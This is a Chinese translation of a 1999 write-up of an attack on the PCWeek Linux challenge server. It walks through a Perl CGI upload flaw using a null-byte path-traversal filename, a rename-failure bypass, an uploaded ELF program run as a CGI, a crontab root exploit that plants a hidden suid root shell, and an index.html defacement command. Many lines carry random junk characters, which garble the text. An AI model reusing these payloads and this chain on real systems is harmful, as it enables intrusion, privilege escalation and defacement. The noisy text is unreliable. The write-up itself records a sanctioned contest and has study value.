JFS侵入PCWEEK-LINUX主機的詳細過程

譯者注：PCWeek-Linux 主機是著名電腦雜志 PCWeek 為了測試 WEB 服務(wù)器 IIS（NT平臺）
. R: G" A9 f6 R6 ^1 c0 P& P和 Apache（Linux平臺）的安全性，提供給黑客/駭客攻擊的兩臺主機之一。另一臺主機安裝
的是 IIS（NT平臺）。詳細情況請訪問網(wǎng)站：http://www.hackpcweek.com/。

) o' X9 R* M: `) J# @
+ ^& K: d, H  {; d( y9 o" }" w  K首先要進行的當然是——收集遠端主機信息：打開的端口和提供的網(wǎng)絡(luò)服務(wù)等。經(jīng)過掃
# z" q5 W2 b* O( N! r4 y' @% n6 v描后發(fā)現(xiàn)大多數(shù)端口都被過濾掉了，原因可能是安裝了防火墻或設(shè)置了 TCP-Wrapper 。所
以我們只能從 HTTP 服務(wù)器著手了。
8 p6 `: V  g* l1 O$ c
lemming:~# telnet securelinux.hackpcweek.com 80
Trying 208.184.64.170...
Connected to securelinux.hackpcweek.com.
( i: [2 k& X9 nEscape character is '^]'.
4 i8 [- _2 K; Q5 nPOST X HTTP/1.0

HTTP/1.1 400 Bad Request
! B/ X) C/ ?& F6 [1 s9 h4 C. Y- XDate: Fri, 24 Sep 1999 23:42:15 GMT
Server: Apache/1.3.6 (Unix) (Red Hat/Linux)
1 X9 p3 V2 T7 n1 c8 g(...)
! t: P! h0 y5 Q5 r+ X; }- ?Connection closed by foreign host.
6 K% K8 E3 _" H8 z; K3 vlemming:~#
  ~: V; s- u6 U/ [
5 W) q" ^2 I' l: E, c6 \& N! Z嗯，服務(wù)器操作系統(tǒng)是 Red Hat，WEB服務(wù)器是 Apache/1.3.6。從網(wǎng)頁上可知服務(wù)器安
# M& Y" ]6 ?+ V  i5 o+ M裝了 mod_perl，但只有一個 fingerprint 功能，對我們沒有什么用處。
Apache 1.3.6 本身沒有包含任何可供遠端用戶使用的CGI程序，但我們不清楚Red Hat
+ K7 L1 X7 x. ?! `8 }$ Y6 |的發(fā)行版本中是否有，所以我們進行了一些測試（test-cgi, wwwboard, count.cgi等）。
結(jié)果令人失望。于是我們嘗試找出網(wǎng)站的結(jié)構(gòu)。經(jīng)過對該網(wǎng)站HTML頁的分析，終于找出
了網(wǎng)站DocumentRoot下的目錄結(jié)構(gòu)：
+ Z! }3 x( S1 B4 b/ U" k/ U7 Y
; s6 f% d! o. B  x8 v) x/
+ L6 J8 @% q) \) V0 G) Q/cgi-bin
/photoads/
3 M) Z3 L4 h% P4 S0 E/photoads/cgi-bin

很自然地，我們的眼光落在 photoads 這個安裝模塊上。該商用CGI包可在"http://
# Q* r( g6 H0 h5 ~www.hoffoce.com"找到，價格為$149，包括供檢查和修改用的PERL源代碼。
2 B* B  P4 k, n, q我們找到一個朋友，了解和掌握 photoads 在 Linux 平臺上的安裝情況，從而大致清楚
運行在該主機上的 photoads。
檢查了缺省安裝的文件后，我們發(fā)現(xiàn)可以取得所有用戶名及其口令的數(shù)據(jù)庫（http://
1 d0 N/ X, t  W2 jsecurelinux.hackpcweek.com/photoads/ads_data.pl），但當我們試圖訪問配置文件
/photoads/cgi-bin/photo_cfg.pl 時，服務(wù)器的設(shè)置拒絕了這個請求。
通過 /photoads/cgi-bin/env.cgi，我們可以知道該服務(wù)器的許多詳細情況，如
% r& A! r) z/ k  E5 T( N& S( pDocumentRoot 在文件系統(tǒng)的位置（/home/httpd/html），運行 Apache 服務(wù)器的用戶（
nobody）等。
6 J' D+ R* [5 S! i  Z. E: A' R現(xiàn)在，開始尋找漏洞的第一步，我們嘗試尋找是否存在 SSI 或 mod_perl 嵌入 HTML
7 N2 |4 ^# n0 u: |1 ]8 `7 F8 p4 E/ m- \命令的漏洞，如：

<!--#include file="..."--> for SSI
3 H8 E3 b8 w5 X% K' R6 i<!--#perl ...--> for mod_perl

但腳本中的匹配表達式卻在許多輸入域上過濾此類輸入。不過與此同時我們卻發(fā)現(xiàn)有一
個用戶賦值的變量在轉(zhuǎn)換成 HTML 代碼前，并沒有檢查其值的合法性。我們可以通過它將命
令嵌入到由服務(wù)器端解析的 HTML 代碼中：

在 post.cgi，行 36：
* c! z; y# ~' T: U. f+ X% sprint "you are trying to post an AD from another URL:<b> $ENV{'HTTP_REFERER'}\n";
0 i! M7 x+ }' ?+ d: J" C3 j3 ]
$ENV{'HTTP_REFERER'}是一個用戶賦值的變量，我們可以通過它將任何 HTML 嵌入到代
  X; l6 e& a1 x5 C1 B, L) u碼中。
: A9 J  h- U0 q8 f3 J請閱讀我們提供的文件 getit.ssi 和 getit.mod_perl。
/ o  F: c, D( k3 e在命令行下使用這些文件如下：

) w/ p# a! @6 k1 f  ulemming:~# cat getit.ssi | nc securelinux.hackpcweek.com 80
* T) S6 \" M, T; w& \/ j/ y
但不幸的是，該主機的配置并不允許 SSI 或 mod_perl，所以我們無法利用這個方法侵
) u: n6 P4 A7 M8 P/ l6 O+ L入系統(tǒng)。

因此我們決定在CGI腳本中尋找缺口。在PERL腳本中許多漏洞往往出現(xiàn)在 open()、
- @7 ?% o8 P$ }" E6 ~; Z$ {system() 或 `` 等調(diào)用中，前一個允許讀/寫/執(zhí)行，而后兩個允許執(zhí)行。
雖然在該主機找不到后兩種調(diào)用，但我們卻發(fā)現(xiàn)了一些 open() 調(diào)用：

2 M6 ], g+ T9 L. Alemming:~/photoads/cgi-bin# grep 'open.*(.*)' *cgi | more

advisory.cgi: open (DATA, "$BaseDir/$DataFile");
edit.cgi: open (DATA, ">$BaseDir/$DataFile");
' H! t; E% }' n+ k" v) q5 q# kedit.cgi: open(MAIL, "|$mailprog -t") || die "Can't open $mailprog!\n";
1 b: |! j! I- F: _7 |* x. sphoto.cgi: open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
! F) V% z5 O2 w. \9 l. ]photo.cgi: open ( FILE, $filename );
  F2 {& }1 C  s: B(...)

$BaseDir 和 $DataFile 兩個變量是在配置文件中定義，且不能在運行時修改，無法被
$ _; M+ x% N8 i: E5 {; D8 M我們利用。
+ V; ?- k7 R: x2 ~3 |4 j6 y但其余兩個就……

在 photo.cgi，行 132：
$write_file = $Upload_Dir.$filename;
( X* x+ Y6 [) ^8 J4 v# ~! d0 |
open(ULFD,">$write_file") || die show_upload_failed("$write_file $!");
- k2 e4 J! Z. y5 fprint ULFD $UPLOAD{'FILE_CONTENT'};
1 O! o$ P5 ?. ^! uclose(ULFD);
1 o" N- e- c9 J: c
因此，如果我們可以修改 $write_file 變量，就可以寫文件系統(tǒng)中的任何文件。
3 i. o4 i; F) I0 b$write_file 變量來自：

6 e$ m; n$ N* i. u+ }3 F, `$write_file = $Upload_Dir.$filename;

其中，$Upload_Dir 在配置文件中定義，我們無法修改，但 $filename 變量又如何呢？

% D; z9 z" C; ~8 t- N在 photo.cgi，行 226：
if( !$UPLOAD{'FILE_NAME'} ) { show_file_not_found(); }

/ G1 v' W$ f- b0 b/ C9 W, b8 `; B$filename = lc($UPLOAD{'FILE_NAME'});
. [# [8 R0 Q" g5 P8 T- }2 G$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;
1 p, X! ]9 k( |8 s. {
if ($filename =~ m/gif/) {
$type = '.gif';
& O! n" _# \0 K}elsif ($filename =~ m/jpg/) {
$type = '.jpg';
2 J/ Y# a3 p, Y}else{
{&Not_Valid_Image}
6 I& _$ a* M, ^' q% ~$ I}

8 V! k0 G( d) W: s  g由此可知，該變量來自從提交表格的變量組分解出來的 $UPLOAD{'FILE_NAME'}，而且必
須經(jīng)過匹配表達式過濾，因此我們不能用"../../../../../../../../etc/passwd"格式來取
得任何文件。匹配表達式為：

- l# b$ J5 @6 _' B. S. M+ M$filename =~ s/.+\\([^\\]+)$|.+\/([^\/]+)$/\1/;

% p( M" \) m$ P我們看到，如 $filename 與該表達式匹配，則返回ASCII碼1（SOH）。同時，變量還必
% Y0 K( A/ z8 \0 i$ Q' H須包含"gif"或"jpg"，以通過 Not_Valid_Image 過濾器。
經(jīng)過多次嘗試，以及從 Phrack 的關(guān)于PERL CGI安全性文章的幫助，我們發(fā)現(xiàn)以下格式

* D- [# {0 [3 Y7 G8 z0 O* [- b- H3 |/jfs/\../../../../../../../export/www/htdocs/index.html%00.gif

可以成功修改WEB服務(wù)器根目錄下的index.html文件。:-)
然而，為了上載文件，我們?nèi)皂毨@過更多的腳本代碼。我們發(fā)現(xiàn)無法通過POST方法發(fā)送
9 Q+ Y: U6 Y( _) [+ t7 M% w包含上述內(nèi)容的表格（無法轉(zhuǎn)換%00），唯一的方法只能是GET。
2 x2 q( w  J% M. Z. Z$ x# I  w; M1 J在 photo.cgi ，行 256，會檢查被上載文件的內(nèi)容是否符合圖像定義（寬/長/大?。?br />   n% ]1 Y$ o8 k+ L3 e/ V/ z（記住，photo.cgi 是被當作某個AD上載圖像的一個方法）。如果不符合這些細節(jié)，腳本將
刪除該上載文件。這當然不是我們所希望的！
PCWeek 網(wǎng)站配置文件將 Imagesize 設(shè)為 0，所以我們可以忽略該腳本中有關(guān)JPG部分，
  Y7 y, q5 X7 \. H, \/ y5 v而將主要精力集中在GIF上。

if ( substr ( $filename, -4, 4 ) eq ".gif" ) {
9 P% o$ D6 c6 o, C+ oopen ( FILE, $filename );
my $head;
my $gHeadFmt = "A6vvb8CC";
my $pictDescFmt = "vvvvb8";
( D1 v9 L9 x+ v* L7 N. t3 p! Nread FILE, $head, 13;
. {, s/ f+ Q& x" U1 y(my $GIF8xa, $width, $height, my $resFlags, my $bgColor, my $w2h) = unpack $gHeadFmt, $head;
/ H8 X8 B2 n4 w+ }) Fclose FILE;
1 B9 g0 G" q) L; X) C2 v$PhotoWidth = $width;
$PhotoHeight = $height;
$PhotoSize = $size;
6 w3 K1 s- f! W8 B  R* ~  }/ }) j; J* Freturn;
}
* |8 Z$ Q+ b2 s" n, _& W. b9 e
( L3 J8 U0 U/ X3 _! k( j7 y9 T在 photo.cgi，行 140：
8 F2 S$ L9 L3 u# z
if (($PhotoWidth eq "") || ($PhotoWidth > '700')) {
{&Not_Valid_Image}
}

( ~+ h3 K( `& X% M0 @1 mif ($PhotoWidth > $ImgWidth || $PhotoHeight > $ImgHeight) {
{&Height_Width}
}
1 s; a6 Z4 N- k
! {+ x5 y# Q" k# _$ z4 q  |由上可知，$PhotoWidth不能大于700，不能為空，且不能大于 $ImgWidth（缺省為350）
7 E; S4 Z. }; l8 i0 i。
所以我們使 $PhotoWidth!="" 且 $Photowidth<350 即可。
對于 $PhotoHeight，則必須小于 $ImgHeight（缺省為250）。
% K& ]: f% X" A綜合以上要求，我們可以得到一個可以使用的數(shù)據(jù)：$PhotoWidth==$PhotoHeight==0。
研究提取該值的腳本后，我們唯一要做的就是將文件的第6至第9字節(jié)的值置為 ASCII 碼 0
（NUL）。
3 |: R2 d. F; O* m在確保 FILE_CONTENT（文件內(nèi)容）符合以上所有要求后，我們又在以下代碼遇到了另一
個問題：

chmod 0755, $Upload_Dir.$filename;
* [, {4 q% ^7 a' ~5 J4 N% C5 ^* J$ k$newname = $AdNum;
/ D" k: D; [. g. |$ Crename("$write_file", "$Upload_Dir/$newname");

* i- T4 d" W% u, IShow_Upload_Success($write_file);
6 k" E; ]( F4 R, C' t; L
5 G3 z; R" }4 N8 e+ L7 Y8 E- h9 J哇！文件將被改名/移動（這可是我們絕對不希望的?。?。
/ A* p* F2 r/ v5 Q" i0 r查找 $AdNum 變量的最終處理過程，我們發(fā)現(xiàn)它只能包含數(shù)字：
, T) t/ P# j+ L8 C. u9 b
% x% a1 A8 @; g; R* w$UPLOAD{'AdNum'} =~ tr/0-9//cd;
$UPLOAD{'Password'} =~ tr/a-zA-Z0-9!+&#%$@*//cd;
$AdNum = $UPLOAD{'AdNum'};

其余的字符將被刪除。因此我們不能直接應(yīng)用"../../../"這種方法。
: H2 i# T" s+ ]/ g2 G' Z0 l那么，應(yīng)該怎樣做呢？我們看到 rename() 函數(shù)需要兩個參數(shù)：舊的路徑和新的路徑。
, ]( _  c- b# X' H哈哈，在函數(shù)過程中沒有錯誤檢查！當函數(shù)出錯后將跳到下一行繼續(xù)執(zhí)行！那么如何才能使
該函數(shù)失敗呢？Linux 內(nèi)核對文件名長度限制為1024字節(jié)。因此如能使腳本將文件改名時新
文件名超過1024字節(jié)長，即可繞過這個過濾器。
& S+ ]1 C% \( Z$ O2 Z& v所以，下一步就是要向系統(tǒng)傳遞一個大約1024字節(jié)長的AD號碼。但由于腳本僅允許我們
( U% M4 D3 J. E4 V發(fā)送對應(yīng)AD號碼已存在的圖片，而且由系統(tǒng)產(chǎn)生一個10^1024（10的1024次冪，即小數(shù)點前有
- Z! d+ X! I+ H1 m1024個數(shù)字——backend注）的AD號碼要花的時間對我們來說似乎太長了。;-)
我們又遇到另一個難題了！……
8 T- F, w& A+ J  ^" I
我們發(fā)現(xiàn)輸入錯誤檢查函數(shù)可以幫助我們創(chuàng)建一個指定的AD號碼！瀏覽 edit.cgi 腳本
后，你也許就會想到：如果輸入是一個文件名+回車符+一個1024位的數(shù)字，會產(chǎn)生什么結(jié)果
7 Q( e) g* V; j+ g/ ]4 Z6 r4 c呢？;-)
請閱讀用于創(chuàng)建新AD值的程序文件 long.adnum。
. X6 o- E2 s8 K+ g; @- A# f1 z當成功繞過 $AdNum 的檢查后，我們就可以讓腳本創(chuàng)建/覆蓋用戶 nobody 有權(quán)寫的任何
( G/ g* m5 N+ W$ D5 U; I: T  g% f- `文件，其中包含了我們所希望的東西（GIF頭部的NUL除外）。
; s, `: u& j# Z& [3 y! ^
2 O# y; m! P: C# }) i8 k. Q& Z現(xiàn)在就讓我們對該主機試一試這個方法。
. R# I- N' e. t6 ?' o0 R+ I嗯，so far so good（一切順利）。但當我們試圖讓腳本改寫 index.html 文件時無法
, J( `" U, Z: ~4 {成功。:( 其中的原因可能是沒有覆蓋該文件的權(quán)限（該文件由root擁有）。

" D4 A6 g3 U  R2 ^; O0 c7 N7 z4 U2 z
5 x9 ?* B/ k; Q/ u8 Z讓我們試一下是否還有其它入侵方法……

我們決定嘗試修改CGI程序，以使其按我們的意愿運行:)。這種方法還可以讓我們搜尋那
* W' t& V- n+ @7 b5 b' S# a些“絕密”文件，然后拿出動賣。:)
' S3 c# S! w, M7 W我們修改了“覆蓋”腳本，并讓其成功地覆蓋了一個CGI！:) 為了不覆蓋那些較為重要
, V% R4 a1 k1 f- s/ i, i' }! h的CGI（這是提高隱蔽性的聰明法子——backend注），最后我們選擇了 advisory.cgi（你知
) J' M3 Y3 v; k5 H, d" c道它有什么用嗎？:)）
1 n* x" y& `! L. K! ?現(xiàn)在，我們將要上載一個shell腳本，以便我們可以執(zhí)行一些命令。呵呵
% p0 c7 \" R4 f$ R& W" @然而，這個以CGI方式運行的shell腳本必須符合以下格式：

: K# h& H! q6 H9 e#!/bin/sh
5 b2 i, U  B/ eecho "Content-type: text/html"
+ d; e/ b7 H6 Ufind / "*secret*" -print
3 Y9 _5 R; g( G
同時要記得，第6至第9字節(jié)必須為0或很小的值，以符合上面提及的大小定義……

+ V* Q/ n% X. {: C1 \#!/bi\00\00\00\00n/sh
" T! ?' ]3 t0 H" P
  Q( p# ?& _8 r以上這種方法是行不通的，內(nèi)核只會讀取前5個字節(jié)（#!/bi）內(nèi)容并執(zhí)行。在該主機中
我們無法只用三個字節(jié)去獲得一個shell。又遇到難題了！:(
/ N; X4 |2 s* y' t
% P% I2 q$ i9 ^% w3 }- z3 y讓我們看一下ELF（Linux缺省可執(zhí)行類型）二進制文件格式，就會發(fā)現(xiàn)那些位置字節(jié)的
內(nèi)容均為0x00。:) Yohoo :)
解決了這個問題后，現(xiàn)在我們需要將這個ELF可執(zhí)行文件上載到遠端服務(wù)器中。注意，文
件內(nèi)容必須經(jīng)過編碼，因為我們已知道只能通過GET方法上載，而不是POST。因此還要考慮到
URI的最大長度。Apache 服務(wù)器上URI最大長度設(shè)為8190字節(jié)。別忘了，我們還有一個很長的
- K& J* a) L2 W( |1024字節(jié)的AD號碼，所以經(jīng)編碼后的ELF文件長度限制為大約7000字節(jié)。
- w, I; E& m% J
以下這個程序：
, [3 k9 R! d* S7 t
3 |0 S7 k/ J7 T/ Qlemming:~/pcweek/hack/POST# cat fin.c
5 z8 e; h+ S2 s7 ?#include <stdio.h>
) g4 Q3 D6 @+ x) f8 [main()
{
printf("Content-type: text/html\n\n\r");
& Q2 b" [# M( V* zfflush(stdout);
execlp("/usr/bin/find","find","/",0);
  g: u) y: d, @4 q}

編譯后：
3 r2 g1 M; X, x4 m7 V" t' }
lemming:~/pcweek/hack/POST# ls -l fin
-rwxr-xr-x 1 root root 4280 Sep 25 04:18 fin*
2 o% X4 ^1 l* k
% s9 x3 G; r' Y  ^( S' `優(yōu)化（清除symbols）后：
0 R/ S' u& {7 F/ G' i" S4 O$ V* _8 u  O/ y
lemming:~/pcweek/hack/POST# strip fin
lemming:~/pcweek/hack/POST# ls -l fin
" ]+ h( t) \% r0 Z, U-rwxr-xr-x 1 root root 2812 Sep 25 04:18 fin*
lemming:~/pcweek/hack/POST#

URL編碼后：

( v0 d+ X8 _# E) y9 v2 I, z/ d- Ulemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
' s4 k! h" Z4 ^& ^5 Rlemming:~/pcweek/hack/POST# ls -l fin.url
-rw-r--r-- 1 root root 7602 Sep 25 04:20 fin.url

這個文件大小超過了限制值。:(
我們只能自行編輯二進制文件以盡量減小文件體積。這可不是一件輕松的工作，但卻有
9 F+ E! w* h, \1 p2 j效：
% B; D0 r0 S" t) ]  v: I: I, }" t
% j8 f% f9 _; H2 H7 X  Jlemming:~/pcweek/hack/POST# joe fin
lemming:~/pcweek/hack/POST# ls -l fin
9 A  {, ~& U( E! l6 U$ X-rwxr-xr-x 1 root root 1693 Sep 25 04:22 fin*
! n) U# A9 F" J" t; t/ z7 q# rlemming:~/pcweek/hack/POST# ./to_url < fin > fin.url
lemming:~/pcweek/hack/POST# ls -l fin.url
  x& b/ l. ]* `-rw-r--r-- 1 root root 4535 Sep 25 04:22 fin.url
6 J: r, w% p) n& H- I* o: Vlemming:~/pcweek/hack/POST#
( ]/ I; _4 @8 u3 c# s
請閱讀 get.sec.find文件，還有 to_url 腳本和用來運行一些基本命令的*.c文件。
) x% B9 K( A( E0 C" k
& j" ?6 H$ W9 q+ A  L! E* H# f現(xiàn)在，將這個CGI上載到服務(wù)器，再用瀏覽器訪問它，如：

wget http://securelinux.hackpcweek.com/photoads/cgi-bin/advisory.cgi
* E/ Q" U, ^  f0 Y
  W/ J7 \3 ~, \- T& t服務(wù)器返回的結(jié)果相當于在服務(wù)器上執(zhí)行 find / 命令。:)
: l* T4 o  d8 [9 i! l" L但我們在該服務(wù)器中找不到任何“絕密”文件，或許是nobody用戶無權(quán)訪問的緣故。:(
我們嘗試了更多的命令搜索，如ls等，但仍無法找到它們的蹤影。
[我懷疑這些文件是否真的保存在該服務(wù)器上！]

: ^% C; u4 C" D* A1 K- `: J
# i- K6 p3 u6 L/ H9 ?  h7 P好了，現(xiàn)在是獲取 root 權(quán)限的時候了。利用最新發(fā)現(xiàn)的 Red Hat crontab 漏洞就可以
輕松做到這一點。該漏洞詳情請參閱 Bugtraq 或 securityfocus 上相關(guān)文檔。
我們修改了源程序以適應(yīng)自己的需要，因為我們不需交互式 root shell，而是創(chuàng)建一個
用戶 nobody 可訪問的 suid root shell，如 /tmp/.bs。我們再次上載該CGI，并運行它，
觀察其運行結(jié)果。
4 N, @% p6 O" e9 n5 V9 D* c1 l我們制作了執(zhí)行"ls /tmp"命令的CGI，執(zhí)行后確認我們已擁有了一個 suid root shell。
另外，我們還上載了一個文件 /tmp/xx，用于修改 index.html 文件。

execlp("/tmp/.bs","ls","-c","cp /tmp/xx /home/httpd/html/index.html",0);

1 l0 O! r# P* J7 |  M好了。游戲結(jié)束！:)
總共花費了大約20個小時，還算不錯！呵呵。:)